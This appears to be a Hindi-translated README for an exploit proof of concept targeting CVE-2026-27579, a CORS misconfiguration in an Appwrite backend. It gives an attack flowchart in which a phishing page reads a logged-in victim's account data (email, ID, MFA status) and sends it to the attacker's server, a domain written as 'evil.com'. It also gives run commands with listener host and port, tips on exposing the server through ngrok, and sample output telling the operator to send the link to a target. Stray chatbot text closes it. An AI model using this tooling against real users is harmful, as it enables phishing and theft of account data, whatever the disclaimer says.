
CVE-2026-27579 के लिए एक्सप्लॉइट PoC, जो Appwrite बैकएंड में CORS गलत कॉन्फ़िगरेशन है, जो दुर्भावनापूर्ण फ़िशिंग पेज के माध्यम से प्रमाणित खाता डेटा की चोरी को प्रदर्शित करता है।
CVE-2026-27579 – अनुमत CORS के माध्यम से क्रेडेंशियल युक्त खाता डेटा लीक
CVE-2026-27579 (GHSA-qh5m-p8jh-hx88)
realtime-collaboration-platform द्वारा उपयोग किए जाने वाले Appwrite बैकएंड में एक गंभीर CORS मिसकॉन्फ़िगरेशन एक हमलावर-नियंत्रित ओरिजिन को क्रेडेंशियल युक्त क्रॉस-ओरिजिन अनुरोधों के माध्यम से लॉग-इन पीड़ितों से संवेदनशील प्रमाणित उपयोगकर्ता डेटा (ईमेल, उपयोगकर्ता ID, MFA स्थिति, आदि) पढ़ने की अनुमति देता है।
/v1/account एंडपॉइंट जिसमें Access-Control-Allow-Origin रिफ्लेक्शन + Access-Control-Allow-Credentials: true हैflowchart TD
A[Victim is logged in\nCollabPlatform / Appwrite] --> B[Victim visits attacker-controlled page\nphishing link / malvertising]
B --> C[Browser sends GET /v1/account\nwith session cookies credentials: 'include']
C --> D[Appwrite reflects arbitrary Origin\nAccess-Control-Allow-Origin: evil.com]
D --> E[Access-Control-Allow-Credentials: true]
E --> F[Browser allows JavaScript to read response\nemail, $id, mfa, name, ...]
F --> G[Data exfiltrated to attacker server\nPOST /collect]
G --> H[Attacker receives full account details]
--lhost और --lport का समर्थन करता हैpip install flask
# बेसिक उपयोग
python3 exploit.py --lhost 192.168.1.100 --lport 8000
# डोमेन / सार्वजनिक IP का उपयोग करना
python3 exploit.py --lhost attacker.yourdomain.com --lport 8080
# सार्वजनिक एक्सपोज़र के लिए (अनुशंसित)
# 1. स्क्रिप्ट चलाएँ
# 2. ngrok का उपयोग करें: ngrok http 8000
# 3. कोड में http://<lhost>:<lport> को अपने ngrok URL से बदलें
# (या --lhost = your-ngrok-url.ngrok-free.app के साथ फिर से चलाएँ)
चलाने पर उदाहरण आउटपुट:
[*] Starting malicious server → http://192.168.1.100:8000
[*] Send this link to the target:
http://192.168.1.100:8000/
पीड़ित लॉग-इन होने पर लिंक विज़िट करता है → डेटा टर्मिनल में दिखाई देता है + stolen_accounts.txt में सहेजा जाता है
यह कोड केवल शैक्षिक उद्देश्यों, अधिकृत सुरक्षा परीक्षण, रेड-टीम अभ्यास और कमज़ोरी अनुसंधान के लिए प्रदान किया गया है।
स्पष्ट लिखित अनुमति के बिना किसी भी सिस्टम या व्यक्ति के विरुद्ध अनधिकृत उपयोग अधिकांश न्यायक्षेत्रों में अवैध है (कंप्यूटर धोखाधड़ी, अनधिकृत पहुँच, डेटा चोरी, फ़िशिंग कानून, आदि)।
केवल उन वातावरणों में उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास औपचारिक अनुमति है।
Mohammed Idrees Banyamer
सुरक्षा शोधकर्ता
जॉर्डन
Instagram: @banyamer_security
बेझिझक इसे सीधे अपनी README.md फ़ाइल में कॉपी-पेस्ट करें।
यदि आप स्क्रीनशॉट जोड़ना चाहते हैं, बैज रंग बदलना चाहते हैं, अधिक अनुभाग (डेमो, शमन, आदि) जोड़ना चाहते हैं, या लाइसेंस बैज / स्टार / फोर्क काउंटर शामिल करना चाहते हैं — मुझे बताएं और मैं इसे विस्तारित कर सकता हूं।